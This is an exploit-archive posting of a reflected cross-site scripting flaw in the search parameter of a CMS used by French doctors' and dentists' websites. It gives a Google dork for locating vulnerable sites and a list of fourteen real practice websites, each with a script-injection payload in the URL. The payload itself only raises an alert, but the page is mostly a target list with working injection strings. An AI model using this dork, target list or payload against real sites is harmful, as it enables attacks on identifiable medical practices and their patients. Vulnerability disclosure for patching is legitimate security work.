French doctors cms cross site scripting

2017.01.20
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

###################### # Exploit Title : French doctors cms cross site scripting # Exploit Author : Ashiyane Digital Security Team # Google Dork : intext:"Mentions l├ęgales" inurl:"recherche.php?recherche=" # Date: 01-12-2016 # Tested On : windows 7 /firefox ###################### #http://www.dr-meynier-pascal.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.cabinetborbarriere.com/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.dr-berenguer-christophe.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.dr-salama-jean-pierre.com/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.dr-lamouret-benoit.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.dr-dadoun-hubert.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.dr-pradelle-xavier.chirurgiens-dentistes.fr/recherche.php?recherche=><script>alert(/XSS/)</script> #http://www.dr-haffani-slim.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.dr-jamous-antoine.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script> #http://docteurmaxboukris.com/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.docteurdanan.fr/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.dr-guiss-herve.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.cabinet-carrefour-europe.com/recherche.php?recherche="><script>alert(/XSS/)</script> #http://www.dr-soissong-netzer-audrey.chirurgiens-dentistes.fr/recherche.php?recherche="><script>alert(/XSS/)</script>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top